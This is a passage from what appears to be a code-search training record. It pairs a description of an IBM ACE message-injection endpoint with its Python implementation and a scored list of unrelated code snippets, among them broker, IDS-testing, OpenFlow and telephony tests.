type(file_dict) is dict:\n request_file_dict = {}\n for name in query_obj:\n query_obj_value = query_obj[name]\n request_file_dict[name] = (\n name,\n json.dumps(query_obj_value),\n \"application/json\",\n )\n file_list = []\n for name in file_dict:\n file_list.append(os.path.join(file_dict[name], name))\n # path = file_dict[name]\n # request_file_dict[name] = (name, open(path, \"rb\"), \"application/binary\")\n payload = None\n else:\n file_list = None\n payload = query_obj\n\n result = self._dispatch_json(\n \"post\",\n self._query_url(),\n payload,\n file_list,\n )\n if result.get(\"inserts\") or result.get(\"deletes\"):\n return \"Commit successfully made.\"\n return result", "def render_POST(self, request, query=None):\n # make a parser and parse the request\n parser = qp.QueryParser(request)\n if not query: query = request.content.read() \n try: \n # 
run the query locally\n d = parser.runquery(self.db, query)\n except Exception, e:\n log.err(\"Failing query: \" + str(query))\n log.err()\n setResponseCode(request, e, 400)\n return str(e)\n else:\n # and send the reply\n request.setHeader('Content-type', 'application/json')\n\n if not query.strip().startswith('apply'):\n # apply streams the output out itself\n d.addCallback(lambda reply: (request, reply))\n d.addCallback(self.send_reply)\n d.addErrback(lambda x: self.send_error(request, x))\n return server.NOT_DONE_YET", "def to_simple(self, request, data, many=False, **kwargs):\n schema = self.get_schema(request, **kwargs)\n return schema.dump(data, many=many).data if schema else data", "def handle_request(self, given_request: Request):\n with open(request.output, mode=\"w\", encoding='utf-8') as file:\n file.write(request.result)\n return True", "def request_data():\n if request.method in ('POST', \"PUT\"):\n return request.get_json(force=True)\n else:\n return request.values", "def parse_query(request):\n\n querystring = request.uri['query']\n fp = StringIO(querystring)\n\n headers = {}\n headers['content-type'] = request.message.get('content-type')\n headers['content-length'] = request.message.get('content-length')\n\n environ = {}\n environ['REQUEST_METHOD'] = request.method\n\n boundary = request.message.get('boundary')\n\n query = cgi.FieldStorage( fp = fp\n , headers = headers\n , outerboundary = boundary\n , environ = environ\n , keep_blank_values = True\n , strict_parsing = False\n )\n\n return query", "def handle_log_output(original_parameters_string: Optional[Any]) -> Dict[str, Any]:\n if original_parameters_string is None:\n return {}\n\n if isinstance(original_parameters_string, bytes):\n mystr = original_parameters_string.decode(\"utf-8\")\n elif isinstance(original_parameters_string, str):\n mystr = original_parameters_string\n else:\n mystr = str(original_parameters_string)\n\n if mystr.strip() == \"\":\n return {}\n\n urlencoded = False\n try:\n parameters = orjson.loads(mystr)\n except orjson.JSONDecodeError:\n try:\n parameters = urllib.parse.parse_qs(mystr)\n urlencoded = True\n except Exception: # pragma: no cover\n return original_parameters_string\n\n return obfuscate_dict(parameters, urlencoded=urlencoded)", "def post(self, request):\n # data = dict(request.query_params.items())\n validation_details = self._validate_keywords_extraction_params(\n request.data\n )\n if not validation_details['status']:\n return Response(\n validation_details['error_data'],\n status=status.HTTP_400_BAD_REQUEST\n )\n params = validation_details['params']\n doc = params['document']\n args = (doc, params['max_grams']) if params['max_grams'] else (doc,)\n key_ngrams = get_key_ngrams(\n *args,\n include_numbers=params.get('include_numbers', False)\n )\n return Response(key_ngrams)", "def test_save_request(self):\n\n entry = RequestEntry.objects.filter(path='/test_urn/')\n self.assertEqual(entry.count(), 0)\n self.client.get('/test_urn/')\n self.assertEqual(entry.count(), 1)" ]
[ "0.5780125", "0.561636", "0.551793", "0.54183286", "0.51633644", "0.51528674", "0.5141749", "0.5132121", "0.5078204", "0.50738424", "0.5060169", "0.5056697", "0.50541925", "0.50471795", "0.5036605", "0.50358754", "0.50194955", "0.500363", "0.49596575", "0.4937282", "0.49279454", "0.49206468", "0.49101698", "0.4902082", "0.49003977", "0.4895568", "0.48807725", "0.4854531", "0.48343998", "0.48301384" ]
0.64579356
0
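A hedged sketch of process_queries being exercised directly. Here process_queries and is_valid_query are assumed to be the functions shown above, and create_dir_if_not_exists is assumed to wrap os.makedirs; the fake request object only needs the .data attribute the code actually reads:

import json
from types import SimpleNamespace

fake_request = SimpleNamespace(data=json.dumps({
    "titles": "//book/title",  # valid XPath -> file written, reported as "created"
    "broken": "//book[@id",    # invalid XPath -> reported as "invalid XPath expression"
}))

body, status = process_queries(fake_request, "queries/demo", replace_allowed=False)
print(status)  # 200
print(body)    # {'titles': 'created', 'broken': 'invalid XPath expression'}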
Returns a query result dictionary, given an ACE Record instance and a dictionary of the XPath queries that need to be executed on this record.
def query_dict_for_record(record, touched_queries):
    result = dict()
    if len(touched_queries) > 0:
        parsed_record = etree.parse(StringIO(record.test_data_xml()))
        result.update(dict((q_name, {'query': q_value,
                                     'result': list(x.text for x in etree.ETXPath(q_value)(parsed_record))})
                           for q_name, q_value in touched_queries.items()))
    return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def execute_records_query(query):\n result, hits, output = execute_basic(TYPE_RECORD, query)\n for rec in hits.get('hits', []):\n record = rec.get('_source')\n record['score'] = rec.get('_score')\n record['text'] = rec.get('highlight', {}).get('text')\n output['results'].append(record)\n return output", "def _evaluate(self):\n if not self._evaluated:\n query = { 'query' : self._query.serialize() }\n if self._min_score is not None:\n query['min_score'] = self._min_score\n if self._highlight is not None:\n query['highlight'] = self._highlight\n if self._order is not None:\n query['sort'] = self._order\n\n params = {}\n if self._offset is not None:\n params['from'] = int(self._offset)\n if self._limit is not None:\n params['size'] = int(self._limit)\n if self._only_fields:\n params['fields'] = \",\".join(self._only_fields)\n\n self._results = self._document._meta.search_engine.search(\n query,\n **params\n )\n self._evaluated = True\n\n return self._results", "def perform_queries(records, project_type, project, msgflow):\n all_queries = subdirs_file_content_to_dict(os.path.join(data_dir, project_type, project, msgflow),\n split_by_line=False, subdict_by_path=True)\n result = list({'from': {'node': record.source_node, 'terminal': record.source_terminal},\n 'to': {'node': record.target_node, 'terminal': record.target_terminal},\n 'queries': query_dict_for_record(record,\n all_queries.get(record.source_node, dict()).get(\n record.source_terminal, dict()) |\n all_queries.get(record.target_node, dict()).get(\n record.target_terminal, dict()))}\n for record in records)\n return result", "def query(self, page) -> [str, dict]:", "def query(self):\n return {\n 'name': self.NAME,\n 'statistics_queries': self._statistics_queries\n }", "def query(self) -> dict:\n raise NotImplementedError()", "def query(self, q):\n for key in self.metadb.query(q):\n yield key, self.datadb[key]", "def do_search(arg):\n result = {'count': 0, 'time': 0, 'records': []}\n try:\n uri, q, k, m = arg\n dqp = Pyro.core.getProxyForURI(uri)\n scoresLen,results,indocids,exdocids = dqp.search(q, k, m)\n result=(scoresLen,results,indocids,exdocids)\n except Exception as e:\n print \"Exception:\", e\n return result", "def fetch_querydict(self):\n query = dict()\n query[\"filtered\"] = dict()\n if self.q_dict and isinstance(self.q_dict, dict):\n query_list, filter_list = self.build_query_structure()\n if query_list:\n query[\"filtered\"][\"query\"] = {\"bool\": {\"must\": query_list}}\n if filter_list:\n query[\"filtered\"][\"filter\"] = {\"bool\": {\"must\": filter_list}}\n return query", "def query(self,\n query: str,\n datatype: str = \"response\",\n page: int = 0,\n indices: str = \"\") -> dict:\n endpoint = \"/api/responses/\"\n if datatype == \"cert\":\n endpoint = \"/api/certs/\"\n elif datatype == \"domain\":\n endpoint = \"/api/domains/\"\n ret = self._request(\n endpoint=endpoint,\n params={\n \"q\": query,\n \"indices\": indices,\n \"start\": page * 20,\n },\n )\n return ret", "def __get_results(self, query):\n return self.mysql.query_multi_with_fetchall_as_dict(query)", "def Result(row, schema):\r\n return dict(zip(schema.fields(), row))", "def _get_queried_pts(self):\n queries = {}\n for f_name in self.f_names:\n queries[f_name] = np.asarray([qi.pt\n for qi in self.query_history[f_name]])\n return queries", "def prepare_queries(self):\n self.log.info(\"preparing queries ...\")\n self.prepared_queries = {}\n self.prepared_query_to_str = {}\n initNs = {\"rdfs\": RDFApi.RDFS}\n get_classes = \"\"\"\n SELECT ?class\n WHERE 
{\n ?class rdf:type rdfs:Class .\n }\n \"\"\"\n self.add_prepared_query(\"get_classes\", get_classes, initNs)\n\n get_properties = \"\"\"\n SELECT ?property\n WHERE {\n ?property rdf:type rdf:Property .\n }\n \"\"\"\n self.add_prepared_query(\"get_properties\", get_properties, None)\n\n get_term_to_label = \"\"\"\n SELECT ?term ?label\n WHERE {\n ?term rdfs:label ?label\n }\n \"\"\"\n self.add_prepared_query(\"get_term_to_label\", get_term_to_label, initNs)\n\n get_term_to_desc = \"\"\"\n SELECT ?term ?desc\n WHERE {\n ?term rdfs:comment ?desc\n }\n \"\"\"\n self.add_prepared_query(\"get_term_to_desc\", get_term_to_desc, initNs)\n\n get_ancestors = \"\"\"\n SELECT ?class\n WHERE {\n ?subject rdfs:subClassOf* ?mid .\n ?mid rdfs:subClassOf* ?class .\n }\n group by ?class\n order by count(?mid)\n \"\"\"\n self.add_prepared_query(\"get_ancestors\", get_ancestors, initNs)", "def iParseQuery(queryResults):\n iPaths = []\n results = queryResults.get_results()\n\n for item in results:\n for k in item.keys():\n if k.icat_key == 'DATA_NAME':\n name = item[k]\n elif k.icat_key == 'COLL_NAME':\n coll = item[k]\n else:\n continue\n iPaths.append(coll+'/'+name)\n return iPaths", "def select_rows_dict_cursor(self, query):\r\n self.connect()\r\n with self.conn.cursor(cursor_factory=DictCursor) as cur:\r\n cur.execute(query)\r\n records = cur.fetchall()\r\n cur.close()\r\n return records", "def get_results(query):\n user_agent = \"WDQS-example Python/%s.%s\" % (sys.version_info[0], sys.version_info[1])\n sparql = SPARQLWrapper(\"https://query.wikidata.org/sparql\", agent=user_agent)\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n return sparql.query().convert()", "def query(self, qpath):\n return data.Query(self, qpath)", "def get_query(query):\n global database\n res = database.conn.execute(query)\n out = res.fetchall()\n return [dict(zip(i.keys(), i)) for i in out]", "def query_records(self, context, rrs):\n records = self.dns_manager.query_records(context, rrs)\n return records", "def get_all_records(self, data: dict, execution_context: dict):", "def extract_results(self, results: Any) -> dict:\n for nested_attribute in self.nested_results_parts:\n results = getattr(results, nested_attribute)\n return results if isinstance(results, dict) else results()", "def find(self, query, fields=None):\n # get records matching query\n records = [rec for rec in self.__data.values()\n if rec.check_condition(query)]\n\n # handle `fields` argument\n if fields is None:\n # return raw results if fields not given\n results = dict(rec.to_id_dict() for rec in records)\n elif isinstance(fields, str):\n # chose one value from each record\n results = [rec[fields] for rec in records]\n elif isinstance(fields, list):\n # chose only values matching given fields\n results = [rec.get_fields_list(fields) for rec in records]\n else:\n raise TypeError(f\"`fields` should be of one of types: \"\n f\"`None`, `str` or `list`. 
got: {type(fields)}\")\n\n return results", "def _get_details(self):\n # formulate the query\n query = '''\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n PREFIX proms: <http://promsns.org/def/proms#>\n PREFIX prov: <http://www.w3.org/ns/prov#>\n SELECT *\n WHERE {\n GRAPH ?g {\n <%(uri)s>\n a ?rt ;\n rdfs:label ?label ;\n proms:nativeId ?nid ;\n prov:generatedAtTime ?gat ;\n proms:wasReportedBy ?rs .\n OPTIONAL {\n ?rs rdfs:label ?rs_label .\n }\n OPTIONAL {\n <%(uri)s>\n proms:startingActivity ?sa .\n ?sa rdfs:label ?sa_label .\n }\n OPTIONAL {\n <%(uri)s>\n proms:endingActivity ?ea .\n ?ea rdfs:label ?ea_label .\n } .\n }\n }\n ''' % {'uri': self.uri}\n\n # run the query\n report_details = database.query(query)\n\n # extract results into instance vars\n if report_details and 'results' in report_details:\n if len(report_details['results']['bindings']) > 0:\n ret = report_details['results']['bindings'][0]\n self.rt = ret['rt']['value']\n if 'Basic' in self.rt:\n self.rt_label = 'Basic'\n elif 'Internal' in self.rt:\n self.rt_label = 'Internal'\n elif 'External' in self.rt:\n self.rt_label = 'External'\n self.label = ret['label']['value']\n self.nid = ret['nid']['value']\n self.gat = ret['gat']['value']\n self.rs = ret['rs']['value']\n self.rs_encoded = urllib.parse.quote_plus(self.rs)\n self.rs_label = ret['rs_label']['value'] if 'rs_label' in ret else self.rs\n if 'sa' in ret:\n self.sa = ret['sa']['value']\n self.sa_label = ret['sa_label']['value']\n if 'ea' in ret:\n self.ea = ret['ea']['value']\n self.ea_label = ret['ea_label']['value']", "def records(self) -> Generator[Record, None, None]:\n mapping = [(r, self.get_column(r).name) for r in self.query.refs]\n q = self.compose_query()\n log.info(\"Query: %s\", q)\n with self.engine.connect() as conn:\n rp = conn.execution_options(stream_results=True).execute(q)\n while True:\n rows = rp.fetchmany(size=DATA_PAGE)\n if not len(rows):\n break\n for row in rows:\n row_map = row._mapping\n data: Record = {}\n for ref, name in mapping:\n value = sanitize_text(row_map[name])\n if value is not None:\n data[ref] = value\n yield data", "def collect_queries(\n traversal: Traversal, resources: TaskResources\n) -> Dict[CollectionAddress, str]:\n\n def collect_queries_fn(\n tn: TraversalNode, data: Dict[CollectionAddress, str]\n ) -> None:\n if not tn.is_root_node():\n data[tn.address] = GraphTask(tn, resources).generate_dry_run_query()\n\n env: Dict[CollectionAddress, str] = {}\n traversal.traverse(env, collect_queries_fn)\n return env", "def evaluate(self) -> Dict[str, Any]:\n kwargs = {\"ids\": self._ids}\n return {\n metric.value: self._metric_funcs[metric](\n self._targets, self._preds, **kwargs\n )\n for metric in self._metrics\n }", "def search_all_records(self, data: dict, execution_context: dict):", "def serializeSearchResult( result ):\n print( result.__dict__ )\n return { k: getattr( result, k ) for k in result.__dict__ }", "def _rowsFromQuery(cls, transaction, qry, rozrc):\n rows = yield qry.on(transaction, raiseOnZeroRowCount=rozrc)\n selves = []\n names = [cls.__colmap__[column] for column in list(cls.table)]\n for row in rows:\n self = cls()\n self._attributesFromRow(zip(names, row))\n self.transaction = transaction\n selves.append(self)\n returnValue(selves)" ]
[ "0.57072085", "0.5547496", "0.5542535", "0.55252427", "0.5523193", "0.5461427", "0.5346732", "0.53411245", "0.53293097", "0.53058386", "0.5295658", "0.5276403", "0.52639025", "0.51895535", "0.51621974", "0.5137885", "0.51368797", "0.51255596", "0.51243746", "0.512335", "0.51026887", "0.5096258", "0.50822747", "0.5082043", "0.507847", "0.5070176", "0.50575376", "0.505265", "0.5036707", "0.50300485" ]
0.755422
0
Endpoint to exercise a message. The message is injected into the flow; for this, recording and injection must be temporarily enabled on the flow. Test data is then obtained, after which instances of ACERecord are created and sorted on flowSequenceNumber. For each record, an object is created with the from/to node+terminal info, along with the results of the queries matching either the source or the target node+terminal.
def post(self, project_type, project, msgflow, node):
    try:
        # Recording and injection must be temporarily enabled on the flow
        # before the message can be injected.
        ace_conn.start_recording(project_type, project, msgflow)
        ace_conn.start_injection(project_type, project, msgflow)
        ace_conn.inject(project_type, project, msgflow, node, request.data)
        ace_conn.stop_injection(project_type, project, msgflow)
        ace_conn.stop_recording(project_type, project, msgflow)
        # Keep only the records for this application and message flow,
        # ordered by their position in the flow.
        test_payload = sorted(filter(lambda x: x.application == project and x.message_flow == msgflow,
                                     map(lambda x: ACERecord(x), ace_conn.get_recorded_test_data())),
                              key=lambda x: x.flow_sequence_number)
        ace_conn.delete_recorded_test_data()
        result = perform_queries(test_payload, project_type, project, msgflow)
        return result, 200
    except ACEAdminConnectionError as e:
        # A ``return`` in a ``finally`` block would swallow these error
        # responses and force a 200 status, so return from each branch.
        return {"error": str(e)}, 500
    except Exception:
        return {"error": "An error not related to ACE connections occurred."}, 500
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_echo(self):\n self.add_item(\"skill\", \"fetchai/echo:0.5.0\")\n\n process = self.run_agent()\n is_running = self.is_running(process)\n assert is_running, \"AEA not running within timeout!\"\n\n # add sending and receiving envelope from input/output files\n sender = \"sender\"\n default_dialogues = DefaultDialogues(sender)\n message_content = b\"hello\"\n message = DefaultMessage(\n performative=DefaultMessage.Performative.BYTES,\n dialogue_reference=default_dialogues.new_self_initiated_dialogue_reference(),\n content=message_content,\n )\n sent_envelope = Envelope(\n to=self.agent_name,\n sender=sender,\n protocol_id=message.protocol_id,\n message=message,\n )\n\n self.send_envelope_to_agent(sent_envelope, self.agent_name)\n\n time.sleep(2.0)\n received_envelope = self.read_envelope_from_agent(self.agent_name)\n\n # assert sent_envelope.to == received_envelope.sender\n assert sent_envelope.sender == received_envelope.to\n assert sent_envelope.protocol_id == received_envelope.protocol_id\n msg = DefaultMessage.serializer.decode(received_envelope.message)\n assert sent_envelope.message.content == msg.content\n\n check_strings = (\n \"Echo Handler: setup method called.\",\n \"Echo Behaviour: setup method called.\",\n \"Echo Behaviour: act method called.\",\n \"content={}\".format(message_content),\n )\n missing_strings = self.missing_from_output(process, check_strings)\n assert (\n missing_strings == []\n ), \"Strings {} didn't appear in agent output.\".format(missing_strings)\n\n assert (\n self.is_successfully_terminated()\n ), \"Echo agent wasn't successfully terminated.\"", "def run_message():\n import simplejson\n from ssgateway.message import main\n from yaml import load\n parser = argparse.ArgumentParser(\n description='export a table to a yaml file')\n parser.add_argument('--message', dest='message',\n help='the message to run')\n args, env = initialize_command(parser)\n\n message = simplejson.loads(args.message)\n route_config = env['registry'].settings.get('routes')\n message_router = main(load(open(route_config)))\n message_router(message)\n\n env['closer']()", "def test_generated_protocol_end_to_end(self):\n # AEA components\n ledger_apis = LedgerApis({}, FETCHAI)\n\n wallet_1 = Wallet({FETCHAI: FETCHAI_PRIVATE_KEY_FILE})\n wallet_2 = Wallet({FETCHAI: FETCHAI_PRIVATE_KEY_FILE})\n\n identity_1 = Identity(\n name=\"my_aea_1\",\n address=wallet_1.addresses.get(FETCHAI),\n default_address_key=FETCHAI,\n )\n identity_2 = Identity(\n name=\"my_aea_2\",\n address=wallet_2.addresses.get(FETCHAI),\n default_address_key=FETCHAI,\n )\n\n oef_connection_1 = OEFConnection(\n address=identity_1.address, oef_addr=HOST, oef_port=PORT\n )\n oef_connection_2 = OEFConnection(\n address=identity_2.address, oef_addr=HOST, oef_port=PORT\n )\n\n resources_1 = Resources()\n resources_2 = Resources()\n\n # add generated protocols to resources\n generated_protocol_configuration = ProtocolConfig.from_json(\n yaml.safe_load(\n open(\n os.path.join(\n self.cwd,\n \"tests\",\n \"data\",\n \"generator\",\n \"two_party_negotiation\",\n \"protocol.yaml\",\n )\n )\n )\n )\n generated_protocol = Protocol(\n TwoPartyNegotiationMessage.protocol_id,\n TwoPartyNegotiationSerializer(),\n generated_protocol_configuration,\n )\n resources_1.protocol_registry.register(\n TwoPartyNegotiationMessage.protocol_id, generated_protocol\n )\n resources_2.protocol_registry.register(\n TwoPartyNegotiationMessage.protocol_id, generated_protocol\n )\n\n # create AEAs\n aea_1 = AEA(identity_1, [oef_connection_1], wallet_1, 
ledger_apis, resources_1)\n aea_2 = AEA(identity_2, [oef_connection_2], wallet_2, ledger_apis, resources_2)\n\n inform_number = tuple((1370, 1991, 1, 4, 17, 6))\n # message 1\n message = TwoPartyNegotiationMessage(\n message_id=1,\n dialogue_reference=(str(0), \"\"),\n target=0,\n performative=TwoPartyNegotiationMessage.Performative.INFORM,\n inform_number=inform_number,\n )\n encoded_message_in_bytes = TwoPartyNegotiationSerializer().encode(message)\n envelope = Envelope(\n to=identity_2.address,\n sender=identity_1.address,\n protocol_id=TwoPartyNegotiationMessage.protocol_id,\n message=encoded_message_in_bytes,\n )\n # message 2\n reply_message = {1: \"number one\", 2: \"number two\", 7: \"number seven\"}\n message_2 = TwoPartyNegotiationMessage(\n message_id=2,\n dialogue_reference=(str(0), \"\"),\n target=1,\n performative=TwoPartyNegotiationMessage.Performative.INFORM_REPLY,\n reply_message=reply_message,\n )\n encoded_message_2_in_bytes = TwoPartyNegotiationSerializer().encode(message_2)\n\n # add handlers to AEA resources\n agent_1_handler = Agent1Handler(\n skill_context=SkillContext(aea_1.context), name=\"fake_skill\"\n )\n resources_1.handler_registry.register(\n (\n PublicId.from_str(\"fetchai/fake_skill:0.1.0\"),\n TwoPartyNegotiationMessage.protocol_id,\n ),\n agent_1_handler,\n )\n agent_2_handler = Agent2Handler(\n encoded_messsage=encoded_message_2_in_bytes,\n skill_context=SkillContext(aea_2.context),\n name=\"fake_skill\",\n )\n resources_2.handler_registry.register(\n (\n PublicId.from_str(\"fetchai/fake_skill:0.1.0\"),\n TwoPartyNegotiationMessage.protocol_id,\n ),\n agent_2_handler,\n )\n\n # add error skill to AEAs\n error_skill_1 = Skill.from_dir(\n os.path.join(AEA_DIR, \"skills\", \"error\"), aea_1.context\n )\n resources_1.add_skill(error_skill_1)\n\n error_skill_2 = Skill.from_dir(\n os.path.join(AEA_DIR, \"skills\", \"error\"), aea_2.context\n )\n resources_2.add_skill(error_skill_2)\n\n # Start threads\n t_1 = Thread(target=aea_1.start)\n t_2 = Thread(target=aea_2.start)\n try:\n t_1.start()\n t_2.start()\n time.sleep(1.0)\n aea_1.outbox.put(envelope)\n time.sleep(5.0)\n assert (\n agent_2_handler.handled_message.message_id == message.message_id\n ), \"Message from Agent 1 to 2: message ids do not match\"\n assert (\n agent_2_handler.handled_message.dialogue_reference\n == message.dialogue_reference\n ), \"Message from Agent 1 to 2: dialogue references do not match\"\n assert (\n agent_2_handler.handled_message.dialogue_reference[0]\n == message.dialogue_reference[0]\n ), \"Message from Agent 1 to 2: dialogue reference[0]s do not match\"\n assert (\n agent_2_handler.handled_message.dialogue_reference[1]\n == message.dialogue_reference[1]\n ), \"Message from Agent 1 to 2: dialogue reference[1]s do not match\"\n assert (\n agent_2_handler.handled_message.target == message.target\n ), \"Message from Agent 1 to 2: targets do not match\"\n assert (\n agent_2_handler.handled_message.performative == message.performative\n ), \"Message from Agent 1 to 2: performatives do not match\"\n assert (\n agent_2_handler.handled_message.inform_number == message.inform_number\n ), \"Message from Agent 1 to 2: inform_numbers do not match\"\n\n assert (\n agent_1_handler.handled_message.message_id == message_2.message_id\n ), \"Message from Agent 1 to 2: dialogue references do not match\"\n assert (\n agent_1_handler.handled_message.dialogue_reference\n == message_2.dialogue_reference\n ), \"Message from Agent 2 to 1: dialogue references do not match\"\n assert (\n 
agent_1_handler.handled_message.dialogue_reference[0]\n == message_2.dialogue_reference[0]\n ), \"Message from Agent 2 to 1: dialogue reference[0]s do not match\"\n assert (\n agent_1_handler.handled_message.dialogue_reference[1]\n == message_2.dialogue_reference[1]\n ), \"Message from Agent 2 to 1: dialogue reference[1]s do not match\"\n assert (\n agent_1_handler.handled_message.target == message_2.target\n ), \"Message from Agent 2 to 1: targets do not match\"\n assert (\n agent_1_handler.handled_message.performative == message_2.performative\n ), \"Message from Agent 2 to 1: performatives do not match\"\n assert (\n agent_1_handler.handled_message.reply_message == message_2.reply_message\n ), \"Message from Agent 1 to 2: reply_messages do not match\"\n time.sleep(2.0)\n finally:\n aea_1.stop()\n aea_2.stop()\n t_1.join()\n t_2.join()", "def setUp(self):\n self.hex_data = \"0251112233445566778899a1a2a3a4a5a6a7a8a9aaabacadae\"\n self.message_id = 0x51\n self.bytes_data = bytearray(unhexlify(self.hex_data))\n self.address = Address(\"112233\")\n self.target = Address(\"445566\")\n self.flags = MessageFlags(0x77)\n self.cmd1 = int(0x88)\n self.cmd2 = int(0x99)\n self.user_data = UserData(unhexlify(\"a1a2a3a4a5a6a7a8a9aaabacadae\"))\n\n self.msg, self.msg_bytes = hex_to_inbound_message(self.hex_data)\n set_log_levels(\n logger=\"info\",\n logger_pyinsteon=\"info\",\n logger_messages=\"info\",\n logger_topics=False,\n )", "def test_queue_attn_xfer(self):\n events = self.run_and_get_events('fixtures/queue/queue_attn_xfer.json')\n\n expected_events = self.events_from_tuples((\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'targets': [CallerId(code=150010002, number='+31150010004', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'callee': CallerId(code=150010002, number='+31150010004', is_public=True),\n }),\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'targets': [CallerId(code=150010003, number='203', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n }),\n ('on_warm_transfer', {\n 'new_id': 'e83df36bebbe-1507037917.120',\n 'merged_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n 'redirector': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n }),\n ('on_hangup', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '203',\n 'reason': 'completed',\n }),\n ))\n\n self.assertEqual(expected_events, events)", "def testEngine(self):\n e = stomper.Engine(testing=True)\n\n # test session connected message:\n msg = \"\"\"CONNECTED\nsession:ID:snorky.local-49191-1185461799654-3:18\n\n\\x00\n\"\"\"\n result = stomper.unpack_frame(msg)\n correct = ''\n returned = e.react(result)\n self.assertEqual(returned, correct)\n\n # test message:\n msg = 
\"\"\"MESSAGE\ndestination: /queue/a\nmessage-id: some-message-id\n\nhello queue a\n\n\\x00\n\"\"\"\n returned = e.react(msg)\n correct = 'ACK\\nmessage-id: some-message-id\\n\\n\\x00\\n'\n self.assertEqual(returned, correct)\n\n # test error:\n msg = \"\"\"ERROR\nmessage:some error\n\nThere was a problem with your last message\n\n\\x00\n\"\"\"\n returned = e.react(msg)\n correct = 'error'\n self.assertEqual(returned, correct)\n\n # test receipt:\n msg = \"\"\"RECEIPT\nmessage-id: some-message-id\n\n\\x00\n\"\"\"\n returned = e.react(msg)\n correct = 'receipt'\n self.assertEqual(returned, correct)", "def test_admit_consume(self):\n\n rule = ('admit (name:\"one\"; match:\"AB\";)\\n'\n 'alert (name:\"two\"; match:\"BC\";)')\n\n tests = {\n \"ABC\": [\"proxying connection from\"]\n }\n\n self.run_rules(rule, tests)", "def invoke(self, msg, req):\n if msg.name == 'forward':\n init = Initializer.create_init()\n try:\n init.timer()\n return\n except Exception, e:\n print 'Error', e.message\n else:\n raise schema.AvroException('unexpected message:', msg.getname())", "def doTest(self, module, payloads):\n for payload in payloads:\n # Perform test & write report\n str = \"TEST #%s - %s\" % (self.testnum, payload[0])\n print str[:62].ljust(65,'.'),\n #test_dt_start = datetime.datetime.now()\n test_dt_start = time.strftime('%Y-%m-%d %H:%M:%S')\n pattern = \"\"\n\n if payload[1] == \"socket\":\n cmd = self.commandParser('socket', payload[4])\n (test_port, test_proto) = (payload[2], payload[3].lower())\n test_payload = cmd\n if payload[3].lower() == 'tcp':\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n else:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((self._target,payload[2]))\n s.send(cmd)\n pattern = payload[5]\n s.close()\n elif payload[1] == \"command\":\n cmd = self.commandParser('command', payload[2])\n (test_port, test_proto) = (None, None)\n test_payload = ' '.join(cmd)\n if self._debug==1:\n print \"\\n\\n***Debug: sending command: %s\" % ' '.join(cmd)\n subprocess.call(cmd)\n else:\n subprocess.call(cmd, stdout=subprocess.PIPE)\n pattern = payload[3]\n elif payload[1] == \"scapy\":\n cmd = self.commandParser('scapy', payload[2])\n if self._debug == 1:\n print \"\\n\\n***Debug: sending scapy payload: %s\" % cmd\n cmd = cmd.replace('verbose=0', 'verbose=1')\n (test_port, test_proto) = (None, None)\n test_payload = cmd\n eval(cmd)\n pattern = payload[3]\n elif payload[1] == \"pcap\":\n pcap = os.path.join(self.config.get('PATHS', 'pcapdir'), payload[2])\n (test_port, test_proto) = (None, None)\n test_payload = pcap\n if self._debug == 1:\n # verbose mode\n print \"Pcap Replay file\"\n cmd = [self.config.get('ENV','sudo'), self.config.get('ENV','tcpreplay'), '-i', self.config.get('CLIENT','iface'), pcap]\n else:\n # quiet mode\n cmd = [self.config.get('ENV','sudo'), self.config.get('ENV','tcpreplay'), '-q', '-i', self.config.get('CLIENT','iface'), pcap]\n if self._debug==1:\n subprocess.call(cmd)\n else:\n subprocess.call(cmd, stdout=subprocess.PIPE)\n pattern = payload[3]\n\n test_dt_end = time.strftime('%Y-%m-%d %H:%M:%S')\n\n # Sleep before getting alerts\n time.sleep(int(self.config.get('TIMING', 'sleepbeforegetalerts')))\n\n # Get new alerts and calculate new offset\n self.getAlertsFile()\n res = self.getAlertsFromOffset(self.config.get('PATHS', 'tempfile'), self.offset)\n\n # Sig matching\n if pattern != \"\":\n if re.search(pattern, res):\n test_flag = 2\n else:\n if res == '':\n test_flag = 0\n else:\n test_flag = 1\n test_sig_match = pattern\n else:\n 
test_sig_match = None\n test_flag = None\n\n test_alert = res\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n database.DB(self._cnf).addTestResult((module, payload[1], test_dt_start,\n test_dt_end, payload[0], test_port, test_proto, test_payload,\n test_sig_match, res, test_flag))\n\n print \"[ done ]\"\n \n # Sleep before next test\n time.sleep(int(self.config.get('TIMING', 'sleepbeforenexttest')))\n self.testnum += 1", "def analytic(ctx, src, analytic_addr, verbose):\n\n client = TestClient(src, analytic_addr=analytic_addr, verbose=False)\n client.run()", "def install_sample(self, datapath, table_id):\n parser = datapath.ofproto_parser\n ofproto = datapath.ofproto\n # Incoming port 1.\n in_port = 1;\n for timeout in range(60, 1 ,-1):\n # Incoming Ethernet destination\n match = self.create_match(parser,\n {ofproto.OXM_OF_METADATA: timeout})\n # Output to port 2.\n output = parser.OFPActionOutput(2, 0)\n write = parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n [output])\n instructions = [write]\n flow_mod = self.create_flow_add(datapath, 